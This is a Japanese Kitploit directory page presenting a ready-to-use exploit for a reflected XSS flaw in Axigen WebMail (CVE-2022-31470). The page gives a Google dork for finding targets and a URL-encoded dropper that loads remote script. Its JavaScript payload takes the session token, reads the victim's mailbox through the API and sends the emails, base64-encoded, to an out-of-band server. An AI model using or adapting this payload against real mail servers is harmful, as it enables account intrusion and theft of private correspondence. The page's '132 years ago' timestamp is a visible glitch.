Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-08-21-exploit — Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS | Kitploit
ツール/GitHubGitHub/amirzargham/cve-2023-08-21-exploit
フィッシングツール脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集
GitHubamirzargham/cve-2023-08-21-exploit

CVE-2023-08-21-exploit

Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS

リポジトリを見る
132年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

エクスプロイトタイトル: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS

Google Dork: inurl:passwordexpired=yes

日付: 2023-08-21

エクスプロイト著者: AmirZargham

ベンダーホームページ: https://www.axigen.com/

ソフトウェアリンク: https://www.axigen.com/mail-server/download/

バージョン: (10.5.0–4370c946) およびそれ以前のAxigen WebMail

テスト環境: Firefox, Chrome

CVE: CVE-2022-31470

エクスプロイト この脆弱性を悪用するために2番目のReflected XSSを使用し、悪意のあるリンクを作成してユーザーのメールを盗みます。

ドロッパーコード このドロッパーコードは、リモートサーバーからJavaScriptエクスプロイトコードをロードして実行します。

root@kitploit:~
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
  document.body.appendChild(x)
})//

エンコードされたフォーム /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//

エクスプロイトコード

root@kitploit:~
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');

xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
    if (xhr1.readyState === XMLHttpRequest.DONE) {
        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
        xhr2.setRequestHeader('Content-Type', 'application/json');
        xhr2.onreadystatechange = () => {
            if (xhr2.readyState === XMLHttpRequest.DONE) {
                if (xhr2.status === 401){
                    script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
                    document.body.appendChild(script_tag);
                } else {
                    resp = xhr2.responseText;
                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
                    xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
                    xhr3.onreadystatechange = () => {
                        if (xhr3.readyState === XMLHttpRequest.DONE) {
                            emails = xhr3.responseText;
                            script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
                            document.body.appendChild(script_tag);
                        }
                    };
                    xhr3.send();
                }
            }
        };
        var body = JSON.stringify({isUnread: false});
        xhr2.send(body);
    }
};
xhr1.send();

ドロッパーとエクスプロイトの組み合わせ エクスプロイトコードをどこかにホストし、ドロッパーコードでそれを指定できます。

公開先: exploit-db.

公開先: 0day.today.

公開先: packet storm.

ツールをダウンロード